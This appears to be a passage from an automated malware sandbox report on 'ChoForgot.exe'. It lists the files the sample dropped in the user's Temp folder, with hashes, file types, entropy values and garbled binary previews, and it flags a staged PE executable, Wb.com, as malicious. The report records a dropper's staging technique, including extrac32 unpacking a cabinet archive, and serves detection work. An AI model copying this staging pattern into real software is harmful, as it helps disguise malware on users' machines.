                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                                                                                                      MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                                                                                                      SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                                                                                                      SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                                                                                                      SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...........}io.8..w... @*..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C*...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r||z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3d0113f4-ce94-4bc0-83b4-3ac78631ca65.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\4dd3ac0c-f6f0-4f5f-8ed6-d7e2dc4c300a.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):70300
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.836652071119625
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:ysLuWMIBKe19FhAVmEz63lXv2os8VJvxmR5ukmxdL5z/M7tz:rD719umEO3lXvFs8Pi5u7P5z/M7tz
                                                                                                                                                                                                                                                                                                      MD5:B148B122BB58B8165365C9F89467A70D
                                                                                                                                                                                                                                                                                                      SHA1:AD26032DF54814F721DE4C545A6268FA9EFD5562
                                                                                                                                                                                                                                                                                                      SHA-256:DD0B48AD726395A4728039D7AEBD7523403D2A998E4466934C7ECD8C4828D663
                                                                                                                                                                                                                                                                                                      SHA-512:5FFD1833D15F87EACF374F06B3EFF700090FD299DA0848B6F1D092D50A41609C2DEDB9FF5080DEF842978D80297A243C4A16A125FAA7B0917F0056251F986C61
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..*pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ*.>...i.v....A.CD|bfx....).o.g.....I....6...!....<.t*|"....PO*<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~.*.&........:]...*w.md./zkT.Z..F........,."7|.|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\623615\Wb.com

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):947288
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                      • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: acronis recovery expert deluxe 1.0.0.132.rarl.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: trZG6pItZj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: 9EI7wrGs4K.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: Wine.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: GoldenContinent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\623615\f

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):297275
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999341212668941
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:Y+rD4Rgr9rauGzemYrmALg9rA08MHBu9qBvkgwYe2v5ri:Y3R+9rauGzemYaCErZ8MhuUvWn2vJi
                                                                                                                                                                                                                                                                                                      MD5:44BB200868649A063953CF0BB7528502
                                                                                                                                                                                                                                                                                                      SHA1:7DB0B074DDB4F52EAF6ECBFBF41CE67A44B0DAEE
                                                                                                                                                                                                                                                                                                      SHA-256:7D2D6B8D47B9EE4ADE15BD0C992190554268F235C18B27EA8C213D474AD6F7D8
                                                                                                                                                                                                                                                                                                      SHA-512:5592078C4AA02737000942FE204111C72C547B0732A26CB776C572441DBE8BCB9DCBE2443EDE3FEE47899E88E998F2A3B610CED103E834FA34673F28B55E5BA8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.V..6".Zs..F.H7.-~..x...a.i.RM.....u.7.........`e..6.w>+V.^....%....o.~.....L]...OB...=..r..2.m.z....8.../......w.<S.....5....f........Q}....1...>../......v.......soi.D.X.H.........+w.N...q......u..i.u-..|2X.!7A..j......g...C..F.....3......P...;....Z..w^....fql.7.$.H.9....4..Y.v...{.Q.^t.o.;9i..{.a.p`s...C|.^.N..6^.........XZX0.~g.H.5.........S.gH..@.$I.#y`....*......)...=.....KFb.j.VV.C...SeU.....h./.<oG..>l_..$.$...x.\6...I.&46.V:.P..7..yI7.m1...D.......RcF*....P.....i!....}..J.0....J.J5T#3....Gh...5.<t.....].:h..D\..x.|E..`.G5&.Co..t0DC>....6.5B...uI........iN.W..m.{..F.....*.j2...faI~...s/b.n}..a....)..v.z.....d.u.i.......9.cF.C'a/<....."s0Fs.....e.d..z'.d......Ze.'Y.....A.j{@.8....r..F'..9n.A..a,q...%..>..up.R....d..PG.{.F.h(L.E.2...M...+..8.S...).. .(.F......*t U...)|...._..p:......Y.....].o.....A.h.z.O..T..`.9w..A.S.....q..e..JP.~..f...w..?..X.x....f1......<-4x...b..U.4x......yo.0.....|/x..>.N..97.W.1...KpL.C.......'..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Advisor

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.998060761603133
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:UDTO2z/dSbLtDW4ictJHgoI2JnSbp2O+KwpJNlqcN9O7xTT6M17arlMmZv/:UDqWgFK4zfA08MRjpBNg7ZqlPv/
                                                                                                                                                                                                                                                                                                      MD5:CF44A9847F3FB78E1B20E0F6058E073A
                                                                                                                                                                                                                                                                                                      SHA1:47517215A4145D9DCDDB3306C0FB931C71DDFE9D
                                                                                                                                                                                                                                                                                                      SHA-256:D2E7128B474AC99272C683AAEEE8A8F8BDC8638A28D7B5E769C2B894EBC45B31
                                                                                                                                                                                                                                                                                                      SHA-512:EAA9141B5C4BC8FCAD07BF71A6DC14990B83B472BB8FBC156AAF694BC4A9FD984793F4BCD4058B6FB3D6FE88AD828BCE2A8D44F556D3F67870AC484021510FE4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:4.p...^S..5"....N.Z.N..01.0=..iy~.3Y.G....J1..K.F|P.....KjlH..H6..h.s..x..Y.....!..]...].?......m... ...k.u..s....).|....U..:../....#.$.c.&.....j..........\.@.'..|k...... 8...V...'..*W^0...oo..f.^.j.>....G*.x7..........U..l......SE...J.Az...9.l.............<....".7]lB...+d.....}.2w.(..7V.4.2[.-..[....g"O)..z..5...p..R...VR.. ..>.B6..+H(;.D.....jX.%e.h f.W....#..jN....`........}..<.f..:......$.....C6..eb..w.H....G.c....8..mDg....d......7....J.l..|.l.M.7.rn...Y-1.L.~.qCK....o.......5..F|.O8sg..[..f.I.5)%..E/.%.d....v.p.....Ek..hz?.+..q.D.;O...G.cA.-M.rOr..XH.lI..Q,(#..,p!.Zp.........w.Fx...............}.C]^.I...YLQ...p.O.6.*m........S6...TM5.q.T..R.b...(.SwBl.....j<HxTX...f...<..C....$,.o3....@..-.PkC....3..|d..$...s=.=Z.....!S..j.,n...x.F....!..M....a.......@&MdOp@.k.G7...Pq.'.....4.Ps..2...u...u.u.z.Hc...X...++.....TC."..}......l.ei.E.9.V....L..X.-.|.S.5.A...k...R...ZU<.S.k.+S..}.d....l6]..S.......2.2Wm.K.s.a.Z..t/.........t)M..z.AY./....0.vd

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Belt

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):62464
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.65943189347368
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:mWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI93L:mWf05mjccBiqXvpgF4qv+3L
                                                                                                                                                                                                                                                                                                      MD5:BBE29E56FFE75996E8CA9090D7D77F90
                                                                                                                                                                                                                                                                                                      SHA1:D9AA67C8D72E772A80A5FE91B5FA2055ABD7F703
                                                                                                                                                                                                                                                                                                      SHA-256:09EF3302B1439CE599D2ABA0D63131A3C4DCBCBA50A37ABF97D700F120E5FCC1
                                                                                                                                                                                                                                                                                                      SHA-512:F0270133761B242495F079A91625EE365D2E9B127DE3ECC773F0228FDF6E874B53ECFC09AB81EE7C5B0B8C5EDBA99CA74017692D032C0BA520951B92D267CF3E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..E.6.E...A...E...E.>.E.8.E...E...E.F.E.W.E...E...E................................................................................................... ....................................................U..QSVW3.....tf9U.ta..t....t..S....E.=ERCP..2....A...t+.}..w1.u..$...A...A..u...3._^[..u.....K...j..^....A...j..R...j..K.......E...A...A.+.E.4.E.v.E...E...E...E...E...E...A...E...E...E...E...E.&.E.!.E.O.E.\.E...E...E.*.E.<.E.V.E.U..S.].VW.}...j.h....WS.u2...M....N......u._^[]...9X u.9x$t.@...U.....E.VW.}...P....I..........E..m..@....]..E..]..s....m..]..!....}....]......E....G....._3.^....d.,......`5M.;.........h5M..V.`5M.V.v...Y.=`5M..u..h5M......V.....Y^..U.....E.VP....0.I...t..m..]..E..5. K.....^......U..QQVj...E.3.PQQ.6.N..N.....I..E..F..E..F.^..U..QQ.E.V.@.......QQ..$.....u.......]......E.3....F.....^....V..N.....j.V.0...YY..^...VW......I.......+.3.;.w.;.w.._^.;.v...U...$.\#M..e..SVW3.E...Ch..I..M..]......S.E.3M.P.E...P.*....M.......5P#M..M......h..I..M.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Convergence

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.963581589456672
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:oWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2J:oWy4ZNoGmROL7F1G7ho2J
                                                                                                                                                                                                                                                                                                      MD5:EE05BE18D113EB275F51315FB037F70D
                                                                                                                                                                                                                                                                                                      SHA1:7869C95E14B3B7F62DCFF7F1F2466176AF343CD5
                                                                                                                                                                                                                                                                                                      SHA-256:0F914BBE769AA4E7B0E26E0FA78714A7213050EF3907CCFA4A1488CE3B20DF45
                                                                                                                                                                                                                                                                                                      SHA-512:0C857DF0F87B7B4B53492AA743064C11335D1D99AE82D4EA252048D3B7550174224212DC9EE15B075BE371B84FD17A5EE3CF1C7094FD0586D90E9F88B2A46045
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:....\H.Y=B.|&.....1....:"t&...`...Z..?...Q....C..B..m....d.{1e.X..V.p}:..,.s,-o`..}G......X8.pO....;..>Z.>|..4.ATU..e..eY.....@}].A....'h...e..V".Z..L.7..36[.X..%.A.I.g...)..b..-DB......Z..m..i..b.X.#.......a....~....+.e..k.]..d...e...T..)[.3.........&.HGI.B.C.f..5.K.gT..D"........b..|.0.O.O7..W,....S.+\..2...|~...o..[...#..;.a.'Aw*L:..l).U....U.r2......w~CD....M5..4.so..x....f...,...lO..n0..H..Hk...(...f.3.L..Au...H........v..m.....U.m.f...6.....Q....8"...yh$....;...........U..'......w.......&...k...F...eN].....V.=..A"..3.#..]..:"...1....Tu..=U..d2....&...;l.._D.W..F.NU(...>...s\..]...HDZ..spg..]1...FN#*0...`.......=.x..r...../.......W'........,..<.t..P.};..7.b.'A...3.3...?.................K....y^.6.....WK.......!..`.`.....A...3..oU....8.0.P.....["..op!....3..2.B~.R..2....L.c!.....H'...F..L....q......r....?."...m$bR.r...."/....d.r......,.......h/{.....F..(0...&"_.....'.|>...V.....F2.b.br..k.fx..,kEo.T3 ..qh(.#{.........T......y>..ml[.XXX..|......(.T.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Distances

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, 488066 bytes, 12 files, at 0x2c +A "Wal" +A "Trademarks", ID 8707, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):488066
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.998646355083256
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:2EG/Vvvu1MhaeoSbpSAsYXr7SjJBNITh2Lf3MboDT4:2Ecv2i1SAnXr7SjJOh2Lfc+M
                                                                                                                                                                                                                                                                                                      MD5:C83A25D37C14B33C8C977950706E4087
                                                                                                                                                                                                                                                                                                      SHA1:6116CF0A57BE99402DB4C76F72751E33D45B055F
                                                                                                                                                                                                                                                                                                      SHA-256:D84347B22E026490EDB739141CD5AEE2E1A97EE6050E07B93DF005A61EC29F6F
                                                                                                                                                                                                                                                                                                      SHA-512:78EC95011F8BA59A734BC2706CB311201DA0014863B374BB9431394D716095887CD1A923DD39442DA8D5D0BA9FA6976E1EADF4EAA836E9C6583D322F9DD55C8F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MSCF.....r......,................"..L..................Y.m .Wal..\.........Y.m .Trademarks.. ...8.....Y.m .Malawi......X.....Y.m .Improve..X...u.....Y.m .Publicity............Y.m .Wordpress............Y.m .Ix.....\......Y.m .Belt..H..\......Y.m .Ensures.....\(.....Y.m .Convergence.....\(.....Y.m .Gradually..X..\......Y.m .Fitting...][.T..CK}..\TU.8~...U..`TX.cQZ.....(.X.C.......~.t&m...r<..w.m{5.]k.]...jm..0]Es..6.=4la..J...<w@.......s.=/.9.9..y..]...I.....[..<.....(\M...k!.[..x... .d......)|..W)|...........; b*_.T.....W^..,Yy.?#d..."G..<.~.g9.G..x...."1......%.-U.'.d...+.E.MR)/T.H.p....L~B.S......w...".:ER...b<q....vV.=.U+.x...gC........\.J.....3...`..;.U[t_Z.."NX%.e...6%....kr..y..h.3U...+.3..W..6..|-.....J.p$..\.OY..H'@........u.q.$y...|.W.}..].n..n.W<^..;y.G.....`..6..A....V...P..*.}!$qy+......Rx..............2..&.....1..3I.Q.`;D..a......1..*.eP,.bT~..b...%.F...3>.+i.J.._t...|...6.xD.\..:.G.I..)X....T.Kr6..&W..}."1...J..$>].S..(.....h.u....=`R....`

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Ensures

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):83968
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25645948726194
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:FKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcH:FKaj6iTcPAsAhxjgarB/5el3EYrG
                                                                                                                                                                                                                                                                                                      MD5:9055CD07EBC236D6A9ED59A00976303F
                                                                                                                                                                                                                                                                                                      SHA1:B55EF932607C144E36B6729F59A0DF49AF31C546
                                                                                                                                                                                                                                                                                                      SHA-256:D08694349BC677E90FE0D2E398D84022057B042C386D861273E6B7339F532249
                                                                                                                                                                                                                                                                                                      SHA-512:9344045948B93C8305703E9E5E2ED6BB58535028AD58881E06727AE88B058E19E25FD7E790739383B1A3E1B2F11F73AFAC7FD9DCA7BB677CC90DA426D3996ABE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Fitting

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):88064
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.662395544107781
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:+r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLo:M0nEoXnmowS2u5hVOoQ7t8T6pUkBJR84
                                                                                                                                                                                                                                                                                                      MD5:AD99FA74F69F99F32FA2D01579BF7080
                                                                                                                                                                                                                                                                                                      SHA1:0B94621B4C8D976DE408E736811AF2A2B231DD85
                                                                                                                                                                                                                                                                                                      SHA-256:50D7F8DA31679BB21DD88A973C03EA2D5DA501F7B241A740BC1FA98C5B53CCBB
                                                                                                                                                                                                                                                                                                      SHA-512:77AE1948F088ABD47AB53D8C228DFF2B0479F73A455CC33A4F2AD3BF8F855579FC07A1D6E962C4D822DE63FE3E0B01973B7D1608F12BD6893A04EC9619B9C10B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..H.I.S..x...PV..x........M...x...P.V......x....g...^..[....U..S...VW.......=..I.j.j%..5..I........}..P}&j%h.....3..j...|.I.j.j%..........Pj%.$j'h.....3..j...|.I.j.j%..........Pj'h.....3..j...|.I...2......_^..[]...U..j.j.h.....1..H.I..M......u.2...@....]...U..QQVW.u............tVh....Wh'....6..H.I....H...t:.M...u...t/...u....t%.E...PW.X.....t..u....u.j.j..........2._^....U..QV.u....}.....t.P..E.@Ph.....6..H.I...t.....2.^Y]...U......SVW....X....}.......7.E.j..E..c.......X...j.V.E.P.(...V3.Sh.....7..H.I.j..E.PV..X........E.+E..M..7.u.+....E..A...X...j..E........;u.......j.W.E.u.P..X.......E.WSh.....0..H.I.j..E.PW..X....c....E.@u.F;u.~.;u..a.u.j.W.E.u.P..X....o....E.WSh.....0..H.I.j..E.PW..X.........E.@t.F;u.~.;u...+u....M...+....E.....X......._^..[....U... SVW3...VVh.....0.E...H.I....}..........]..[...........t .E.Wj.h.....0..H.I....}.........h..I..M......;.sN.}.V...A$..j|Yf9.u..F...P..$..j|Yf9.u%Q.M...z.....V....$...M....P..z..F;.r..}..M.E.PW........M.}........t.F;...V

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Forth

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1031), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25627
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114528855156142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:SGOEI0d+AeTq4a+op/8O60bx1BuzHOhgDMf7:SGz3+AWq4hg8O60bdoUp
                                                                                                                                                                                                                                                                                                      MD5:2CBBA7BA80508761F55FFD4BEB853102
                                                                                                                                                                                                                                                                                                      SHA1:FE71788DCA26E77F22548FFC39F01BC8F55D2823
                                                                                                                                                                                                                                                                                                      SHA-256:B5F643DB2B4DFC24718865707806F6DD22D9A54EAE16A603C7FEFFE9D98B49CE
                                                                                                                                                                                                                                                                                                      SHA-512:14AB42B3B60D7E7032B0836D0A53670A2D231200121DA5618B06962A401903720A736DF28D049F7CB3FE21E8DA09ACC6DAFAE5B86BB6AFBD79307D99B80C6C09
                                                                                                                                                                                                                                                                                                      Malicious:false
